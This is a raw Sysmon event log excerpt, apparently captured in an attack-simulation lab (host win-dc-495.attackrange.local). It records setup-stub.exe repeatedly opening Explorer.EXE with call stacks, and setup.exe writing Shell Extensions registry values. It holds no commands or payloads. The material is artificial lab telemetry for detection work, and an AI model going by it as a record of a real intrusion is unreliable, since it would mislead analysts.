13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 13241300x800000000000000016500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.896{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000016499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.817{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} 
{000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 10341000x800000000000000016498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
